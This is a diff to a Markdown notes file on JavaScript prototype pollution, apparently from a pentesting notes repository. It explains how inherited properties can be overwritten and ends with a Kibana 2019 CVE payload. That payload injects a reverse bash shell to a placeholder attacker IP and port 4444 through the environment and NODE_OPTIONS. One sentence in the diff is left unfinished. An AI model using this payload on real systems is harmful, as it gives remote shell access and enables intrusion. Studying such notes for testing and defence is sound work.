a few words

Exploits/Web/Prototype Pollution JS.md

@@ -1,31 +1,43 @@
 # Prototype Pollution
 
-* Overwrite built in properties, like constructor, toString of an object.
+Overwrite built in properties, like constructor, toString of an object.
-* Any other instance inherits properties from `Object.__proto__`. toString() is inherited by all objects.
+
+Any other instance inherits properties from `Object.__proto__`. toString() is
+inherited by all objects.
+That means if the `toString()` functions is overwritten it is changed in all
+other objects as well.
+
 ## Usage
-* Access to prototype inside object, as an example Javascript
+
+Access to prototype can be gained inside an object, as an example
+
 ```javascript
 obj.__proto__
 Object.prototype
 ```
-* Create object 
+
+Create an object
+
 ```javascript
 let obj = {}
 ```
-* Create properties inside `__proto__`.
+
+Create properties inside `__proto__`.
+
 ```javascript
 obj.__proto__.isAdmin = true
 ```
 
-### Start Node commands
-* Use 
-    * `require`
-    * `eval`
-
 ### Kibana CVE 2019
-* Write reverse bash into variable
+
+A concrete example is a Kibana prototype pollution from CVE from 2019. Write
+reverse bash into variables so they get
+Therefore Use the following node functions
+
+* `require`
+* `eval`
+
 ```javascript
 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
 .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
 ```
-